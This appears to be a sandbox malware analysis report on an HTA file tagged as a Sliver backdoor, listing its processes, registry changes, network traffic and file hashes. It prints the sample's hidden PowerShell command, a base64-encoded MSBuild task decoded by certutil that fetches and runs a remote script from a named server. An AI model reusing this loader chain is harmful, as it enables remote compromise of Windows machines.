Malware Analysis Report

2024-11-13 13:23

Sample ID 241107-ct2vravrhj
Target 3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3.hta
SHA256 3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3
Tags
sliver backdoor defense_evasion discovery execution trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3

Threat Level: Known bad

The file 3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3.hta was found to be: Known bad.

Malicious Activity Summary

sliver backdoor defense_evasion discovery execution trojan

Sliver RAT v2

SliverRAT

Sliver family

Manipulates Digital Signatures

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Deobfuscate/Decode Files or Information

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-07 02:22

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-07 02:22

Reported

2024-11-07 02:25

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

149s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Sliver RAT v2

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sliver family

sliver

SliverRAT

trojan backdoor sliver

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Manipulates Digital Signatures

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION" C:\Windows\SysWOW64\certutil.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7\Name = "szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL" C:\Windows\SysWOW64\certutil.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_CA_REVOCATION" C:\Windows\SysWOW64\certutil.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Deobfuscate/Decode Files or Information

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\certutil.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\certutil.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2960 wrote to memory of 2780 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2960 wrote to memory of 2780 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2960 wrote to memory of 2780 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2780 wrote to memory of 5108 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\certutil.exe
PID 2780 wrote to memory of 5108 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\certutil.exe
PID 2780 wrote to memory of 5108 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\certutil.exe
PID 2780 wrote to memory of 408 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe
PID 2780 wrote to memory of 408 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe
PID 408 wrote to memory of 2356 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 408 wrote to memory of 2356 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2356 wrote to memory of 3756 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2356 wrote to memory of 3756 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 408 wrote to memory of 620 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 408 wrote to memory of 620 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 620 wrote to memory of 880 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 620 wrote to memory of 880 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 408 wrote to memory of 1992 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 408 wrote to memory of 1992 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1992 wrote to memory of 2880 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1992 wrote to memory of 2880 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden echo PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPg0KICA8IS0tIFRoaXMgaW5saW5lIHRhc2sgZXhlY3V0ZXMgYyMgY29kZS4gLS0+DQogIDwhLS0gQzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29yazY0XHY0LjAuMzAzMTlcbXNidWlsZC5leGUgcHNoZWxsLnhtbCAtLT4NCiAgIDwhLS0gQXV0aG9yOiBDYXNleSBTbWl0aCwgVHdpdHRlcjogQHN1YlRlZSAtLT4NCiAgPCEtLSBMaWNlbnNlOiBCU0QgMy1DbGF1c2UgLS0+DQogIDxUYXJnZXQgTmFtZT0iSGVsbG8iPg0KICAgPEZyYWdtZW50RXhhbXBsZSAvPg0KICAgPENsYXNzRXhhbXBsZSAvPg0KICA8L1RhcmdldD4NCiAgPFVzaW5nVGFzaw0KICAgIFRhc2tOYW1lPSJGcmFnbWVudEV4YW1wbGUiDQogICAgVGFza0ZhY3Rvcnk9IkNvZGVUYXNrRmFjdG9yeSINCiAgICBBc3NlbWJseUZpbGU9IkM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5ldFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxNaWNyb3NvZnQuQnVpbGQuVGFza3MudjQuMC5kbGwiID4NCiAgICA8UGFyYW1ldGVyR3JvdXAvPg0KICAgIDxUYXNrPg0KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtIiAvPg0KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtLklPIiAvPg0KICAgICAgPENvZGUgVHlwZT0iRnJhZ21lbnQiIExhbmd1YWdlPSJjcyI+DQogICAgICAgIDwhW0NEQVRBWw0KICAgICAgICAgICAgICAgIENvbnNvbGUuV3JpdGVMaW5lKCJIZWxsbyBGcm9tIEZyYWdtZW50Iik7DQogICAgICAgIF1dPg0KICAgICAgPC9Db2RlPg0KICAgIDwvVGFzaz4NCiAgICA8L1VzaW5nVGFzaz4NCiAgICA8VXNpbmdUYXNrDQogICAgVGFza05hbWU9IkNsYXNzRXhhbXBsZSINCiAgICBUYXNrRmFjdG9yeT0iQ29kZVRhc2tGYWN0b3J5Ig0KICAgIEFzc2VtYmx5RmlsZT0iQzpcV2luZG93c1xNaWNyb3NvZnQuTmV0XEZyYW1ld29ya1x2NC4wLjMwMzE5XE1pY3Jvc29mdC5CdWlsZC5UYXNrcy52NC4wLmRsbCIgPg0KICAgIDxUYXNrPg0KICAgICAgPFJlZmVyZW5jZSBJbmNsdWRlPSJTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uIiAvPg0KICAgICAgPENvZGUgVHlwZT0iQ2xhc3MiIExhbmd1YWdlPSJjcyI+DQogICAgICAgIDwhW0NEQVRBWw0KICAgICAgICANCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbTsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5JTzsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5SZWZsZWN0aW9uOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOw0KICAgICAgICAgICAgLy9BZGQgRm9yIFBvd2VyU2hlbGwgSW52b2NhdGlvbg0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLkNvbGxlY3Rpb25zLk9iamVjdE1vZGVsOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUnVuc3BhY2VzOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlRleHQ7DQogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuRnJhbWV3b3JrOw0KICAgICAgICAgICAgdXNpbmcgTWljcm9zb2Z0LkJ1aWxkLlV0aWxpdGllczsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIHB1YmxpYyBjbGFzcyBDbGFzc0V4YW1wbGUgOiAgVGFzaywgSVRhc2sNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICBwdWJsaWMgb3ZlcnJpZGUgYm9vbCBFeGVjdXRlKCkNCiAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgIFN0cmluZyBjbWQgPSBAIihOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vc2VjdXJlLmNsb3VkdGVjaG5vbG9naWVzdXNhLmNvbTo4MDgxL3VwZGF0ZS50eHQnKSB8IGlleCI7DQogICAgICAgICAgICBSdW5zcGFjZSBycyA9IFJ1bnNwYWNlRmFjdG9yeS5DcmVhdGVSdW5zcGFjZSgpOw0KICAgICAgICAgICAgcnMuT3BlbigpOw0KICAgICAgICAgICAgUG93ZXJTaGVsbCBwcyA9IFBvd2VyU2hlbGwuQ3JlYXRlKCk7DQogICAgICAgICAgICBwcy5SdW5zcGFjZSA9IHJzOw0KICAgICAgICAgICAgcHMuQWRkU2NyaXB0KGNtZCk7DQogICAgICAgICAgICBwcy5JbnZva2UoKTsNCiAgICAgICAgICAgIHJzLkNsb3NlKCk7DQogICAgICAgICAgICByZXR1cm4gdHJ1ZTsNCiAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgDQogICAgICAgICAgICANCiANCiAgICAgICAgICAgIA0KICAgICAgICBdXT4NCiAgICAgIDwvQ29kZT4NCiAgICA8L1Rhc2s+DQogIDwvVXNpbmdUYXNrPg0KPC9Qcm9qZWN0Pg== > c:\windows\temp\enc3.txt;certutil -decode c:\windows\temp\enc3.txt c:\windows\temp\d.xml;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\windows\temp\d.xml

C:\Windows\SysWOW64\certutil.exe

"C:\Windows\system32\certutil.exe" -decode c:\windows\temp\enc3.txt c:\windows\temp\d.xml

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe" C:\windows\temp\d.xml

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gstxboqt\gstxboqt.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D9E.tmp" "c:\Users\Admin\AppData\Local\Temp\gstxboqt\CSCE00BFF72D7664AF69788AFD696185D14.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zvxymoqo\zvxymoqo.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6E89.tmp" "c:\Users\Admin\AppData\Local\Temp\zvxymoqo\CSC25AF02AD52CF4D8B94EE6A92B03887EE.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oiaydg3g\oiaydg3g.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7196.tmp" "c:\Users\Admin\AppData\Local\Temp\oiaydg3g\CSCD8E0469648454CA48B693F4F20AB42A2.TMP"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 secure.cloudtechnologiesusa.com udp
US 23.239.28.166:8081 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:8080 secure.cloudtechnologiesusa.com tcp
US 8.8.8.8:53 166.28.239.23.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 tcp

Files

memory/2780-2-0x0000000074FEE000-0x0000000074FEF000-memory.dmp

memory/2780-3-0x00000000034A0000-0x00000000034D6000-memory.dmp

memory/2780-4-0x0000000005D80000-0x00000000063A8000-memory.dmp

memory/2780-5-0x0000000074FE0000-0x0000000075790000-memory.dmp

memory/2780-6-0x0000000005AB0000-0x0000000005AD2000-memory.dmp

memory/2780-7-0x0000000005C50000-0x0000000005CB6000-memory.dmp

memory/2780-8-0x0000000005CC0000-0x0000000005D26000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j3wmh52w.apd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2780-18-0x0000000006540000-0x0000000006894000-memory.dmp

memory/2780-20-0x0000000006990000-0x00000000069DC000-memory.dmp

memory/2780-19-0x0000000006960000-0x000000000697E000-memory.dmp

memory/2780-21-0x00000000081B0000-0x000000000882A000-memory.dmp

memory/2780-22-0x0000000006E50000-0x0000000006E6A000-memory.dmp

\??\c:\windows\temp\enc3.txt

MD5 940ed0fa0b1fc8ed6fbf279ab67af56f
SHA1 da4b7c40029542659f025ae74fa0be0fb0fa473c
SHA256 731673720695df22b838e0d256f7506eaa4c7570601db0a409302ab3a0cd1686
SHA512 934e3c5ee3b225ab0d686310a435865880b6c59f4885bb93cca814e8354456de3231364d3aa5cb6bc3c4472e6e6539da719c2b214e998e9e5773cca02f7d14ae

memory/408-26-0x00000198CA600000-0x00000198CA63E000-memory.dmp

memory/408-27-0x00000198CAA00000-0x00000198CAA1A000-memory.dmp

memory/408-28-0x00000198E4C40000-0x00000198E4D9A000-memory.dmp

memory/408-29-0x00000198CC260000-0x00000198CC290000-memory.dmp

C:\windows\temp\d.xml

MD5 6c2a8d820d8d80182aacdc125399cd71
SHA1 51ccd1e0c3247bf24da813a1f660a367f8deefc8
SHA256 104291eb54874a1e80375b91ec552efac6632272654c8a5613730bd2eba9e78a
SHA512 c7c825a9b237850f6d087a449baaeed4e671db91b3db078586e322e992cb26efdb24d0ff8b365291ff58c3786dc563a62c4cbdcb81cecd95027606ef6fffd8c3

memory/408-31-0x00000198E4ED0000-0x00000198E4FF2000-memory.dmp

memory/408-32-0x00000198E4DF0000-0x00000198E4E34000-memory.dmp

memory/408-33-0x00000198E5130000-0x00000198E52AC000-memory.dmp

memory/408-34-0x00000198E54A0000-0x00000198E5806000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\gstxboqt\gstxboqt.cmdline

MD5 2c123d8d6b0e261757321c3c24631ec9
SHA1 e493388caab394135003b268d257a04a3c46398a
SHA256 84bfc09de703b68fda3ac3746862e6c950368df4d6edeff9b74a7efa9187cc28
SHA512 c347b251d1c16ea4e9fc48ee249ee955dd99be00ef621ccf5f59a4dd38f9af38aca4d980274597b5ebec6efaa67f04550107a7f3cc736a4dbb10d8fe78a0b7f2

\??\c:\Users\Admin\AppData\Local\Temp\gstxboqt\gstxboqt.0.cs

MD5 4a4ff4a5e71cabe4864c862a697c1e27
SHA1 b95fb7438213c3ae9caf0e8b52bb301fefcddb56
SHA256 70e3eb02311312b3f1ff90617cb47ebb9b8e7cab47771668811a34584182c6bb
SHA512 7c9257e5f23e2c378f47cb3bdced440d07bf96575a10883e59e0a0b4d8834b0ab3a43e4b850f48e2538021d2b352d732fc93f81277bcc20c45b070dc56bdcff5

\??\c:\Users\Admin\AppData\Local\Temp\gstxboqt\CSCE00BFF72D7664AF69788AFD696185D14.TMP

MD5 e26744a9aa1b123d0cf962a6bed84ea0
SHA1 ba5ff9c78148f7b49a572727ad2e0f803674137c
SHA256 b84a9cca20ba67a01b6431afd70f21ff607a9ac682accb2222ab50d21a0a37ff
SHA512 b601a8c48ca3373fd63b93e18f6003ab6aeeb8281f83fe8e54eb3b88446e6fd27c525e12a5bd9263e11c06ad47cbf7939fb9acb2b358b404d5f200c2d7f1d1b8

C:\Users\Admin\AppData\Local\Temp\RES6D9E.tmp

MD5 581b07e4bf9534cf46654c01f0473072
SHA1 853761080250b1788eeb0c11b217b69100bbe92f
SHA256 4c6ff3c68dba71799c46c674d2b692279b2def94acd42906a6b044829a77ef75
SHA512 4d97f0334c154b608a56d913a6351b28c81dfdbb15129e38d1fa122b0497e796a07f98657811bcba09b1fab19f09b7e4825a39bb58dfd35b69a3764f904655bc

C:\Users\Admin\AppData\Local\Temp\gstxboqt\gstxboqt.dll

MD5 f6d05648bf7d44ba45bc199748566314
SHA1 8ae62d5e40f2be0c9451474e8b385cfd4d2f49a0
SHA256 132ad86e7d9df4f578c00f625b1f8aef8744e3a82b2cc9fc5e9b7a5979dcc487
SHA512 c5250eaf686c6de0495ada367a403831e58922545ca09c08dba8b62d829b61b3ea923b47f521981ad8c523cef7638bfc34deadb8c2c60e10bcd7d7ec817b6dc2

C:\Users\Admin\AppData\Local\Temp\gstxboqt\gstxboqt.pdb

MD5 c01a4183d5644e88298252052d9052ed
SHA1 c5ac4aed17b208985496c98acb04aa384e854791
SHA256 7592de542ec502a037e03ccb8bd915ab2e882eb7e43fdc1d5acd12917c740ba4
SHA512 d9150854eb94e1890c472aa137b5ee85a673aeae7eb7ac2b3f4356a1df221a0ccc22a2fc16edf2f688fa5230ce6eb27297e787c721cd069de22b16ccaea6a142

memory/408-49-0x00000198CC240000-0x00000198CC248000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\zvxymoqo\zvxymoqo.cmdline

MD5 74e1e81b8e245e5353883ecd04473787
SHA1 f5977f6681ed5a75e88122baddde9a59d5de8686
SHA256 f9426a49283c4c35f279c90e83f3e8b89f9ee99f05723ed221858f32aa6503fb
SHA512 896d83b054a74f598c14bd420c9db8250cb43a531f420e5295d02309a9cc4326c7da9d816848f04f84b99eb3d137280134826d661aae153e3c0be256fb580033

\??\c:\Users\Admin\AppData\Local\Temp\zvxymoqo\zvxymoqo.0.cs

MD5 da1f4b7b1a87cc475dfa05923b6301a0
SHA1 0e2ff764c519bc8169b66437857f01e25676e343
SHA256 624fe16b05ade5d9929c6ecf16857939230ea32156405c18b4dacfb0448e310e
SHA512 d09603fd0e641122cc99ccf6c53bb93db7df2b52ed1cdd44d3e73d963a3e9fd12eb1918477c043ba39e2ae123071f2df98b9180eb2a533c01bbdbaab2563b53b

\??\c:\Users\Admin\AppData\Local\Temp\zvxymoqo\CSC25AF02AD52CF4D8B94EE6A92B03887EE.TMP

MD5 33b56617cce8f0255bf61fa2c46ecfb8
SHA1 54bb92291ec27a118c1a89a1eefe8ff5b928ba60
SHA256 bf9af33edfe4df2509f2dea73db7aad80a004dd447092b4aa4d582e645bf4009
SHA512 bfa6606ce236d3cf4966a9784325fa7edc96c626c14c978e91b37f676a77e7c7d6d5a2735e7fcc767aca33ea131c738e9f0e51b7846c85de4bda57b272711811

C:\Users\Admin\AppData\Local\Temp\RES6E89.tmp

MD5 ceb2f8e2ef1e140f3a8192f8288d370f
SHA1 1b05af53ae29e0cdc6d9f2186f91f94e540e3ecb
SHA256 f8994e14f5a9dd621607426c89d52ad97801bf0e6aa969b7fc1f8376bfcee170
SHA512 674c696326810545d0912609aef899f019e9a169839e38c2472278ebb66c94bf37446d4361b52c14d8971bb7894d6b7badb8fc0653e32c6bdde0c332dccba631

C:\Users\Admin\AppData\Local\Temp\zvxymoqo\zvxymoqo.dll

MD5 628c15da69547318f16ecf52f9040f1e
SHA1 395fa6dcdf12287e083f2ffffac7281390bbe0e3
SHA256 4a3e7db6afab63a3abc793490bb12566c66c12d468600483638248de824602cb
SHA512 ea30841bc718ba47295e1e5ef1b810c6dc8d3e4c556779d6fb3f91c5c1461c2c577d0e2ae488b4003de3ce15d00d77a280aa4c9fdac7c09a86e9e7caa51842fd

C:\Users\Admin\AppData\Local\Temp\zvxymoqo\zvxymoqo.pdb

MD5 aada54813034147ce8d2259bbe2a91d2
SHA1 82246f20afc8dd97b394b7db8169437914a9ca63
SHA256 fbeea46d857ec73255d05172a689e815aed207fb6e1b2c979c0417a85c8e33a0
